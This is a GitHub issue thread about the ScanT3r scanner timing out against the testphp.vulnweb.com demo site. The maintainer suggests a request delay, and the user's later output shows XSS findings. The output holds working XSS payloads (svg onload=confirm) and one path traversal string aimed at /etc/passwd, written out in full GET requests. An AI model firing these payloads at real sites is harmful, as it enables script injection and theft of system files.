how fix
Kalimon12 opened this issue · comments
root@kali:~/scant3r# echo "testphp.vulnweb.com" | gauplus | grep "=" | qsreplace |./scant3r.py -m xss
__ _____
______________ _____ / /|__ /_____
/ / / __ `/ __ / // </ /
( ) // // / / / / // / /
//___/_,// //_/___//
[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.8#Beta
[INFO][2021-08-21,19:24:30] scant3r -> Load xss Module
[INFO][2021-08-21,19:24:30] scant3r -> Run modules.python.xss
[ERROR][2021-08-21,19:24:45] requester -> HTTPSConnectionPool(host='testphp.vulnweb.com', port=443): Max retries exceeded with url: /listproducts.php (Caused by ConnectTimeoutError(<urllib3.connection.VerifiedHTTPSConnection object at 0x7f41782b39a0>, 'Connection to testphp.vulnweb.com timed out. (connect timeout=10)'))
[ERROR][2021-08-21,19:24:55] requester -> HTTPSConnectionPool(host='testphp.vulnweb.com', port=443): Max retries exceeded with url: /listproducts.php (Caused by ConnectTimeoutError(<urllib3.connection.VerifiedHTTPSConnection object at 0x7f41781debe0>, 'Connection to testphp.vulnweb.com timed out. (connect timeout=10)'))
hello @Kalimon12 , thanks for this report for quick saw i think this error because of many requests of scant3r sender you can use -s option for sleep between requests
if you think this is wrong , please give me the output of this command $ echo "testphp.vulnweb.com" | gauplus | grep "=" what you think about this
best regards @knassar702
it's work thank you pro
root@kali:~/scant3r# echo "testphp.vulnweb.com" | gauplus | grep "=" |./scant3r.py -s 5 -m xss
/ /____ ____ / /| /____
\ / __/ _ `/ _ / // </ /
//_/_,////_/___//
[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.8#Beta
[INFO][2021-08-22,14:16:20] scant3r -> Load xss Module
[INFO][2021-08-22,14:16:20] scant3r -> Run modules.python.xss
[ERROR][2021-08-22,14:16:35] requester -> HTTPSConnectionPool(host='testphp.vulnweb.com', port=443): Max retries exceeded with url: /listproducts.php?cat=1scan6QTtr (Caused by ConnectTimeoutError(<urllib3.connection.VerifiedHTTPSConnection object at 0x7f683433b550>, 'Connection to testphp.vulnweb.com timed out. (connect timeout=10)'))
[ERROR][2021-08-22,14:16:35] requester -> HTTPSConnectionPool(host='testphp.vulnweb.com', port=443): Max retries exceeded with url: /listproducts.php?cat=1scanJAVtr (Caused by ConnectTimeoutError(<urllib3.connection.VerifiedHTTPSConnection object at 0x7f6834280130>, 'Connection to testphp.vulnweb.com timed out. (connect timeout=10)'))
[INFO][2021-08-22,14:16:36] show_msg ->
[+] XSS: http://testphp.vulnweb.com/listproducts.php
Method: GET
params: artist=gxss">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"&cat=%3CsCriPt%3Enew+Image">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
payload: ">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
---- Request ----
GET http://testphp.vulnweb.com/listproducts.php?artist=gxss%22%3EScanT3r%3Csvg/onload=confirm(/ScanT3r/)%3Eweb%22&cat=%3CsCriPt%3Enew+Image%22%3EScanT3r%3Csvg/onload=confirm(/ScanT3r/)%3Eweb%22 HTTP/1.1
User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
Content-Type: text/html
--------
[INFO][2021-08-22,14:16:36] show_msg ->
[+] XSS: http://testphp.vulnweb.com/showimage.php
Method: GET
params: file=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
payload: ">ScanT3r<svg/onload=confirm(/ScanT3r/)>web"
---- Request ----
GET http://testphp.vulnweb.com/showimage.php?file=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%22%3EScanT3r%3Csvg/onload=confirm(/ScanT3r/)%3Eweb%22 HTTP/1.1
User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
Content-Type: text/html
Great :D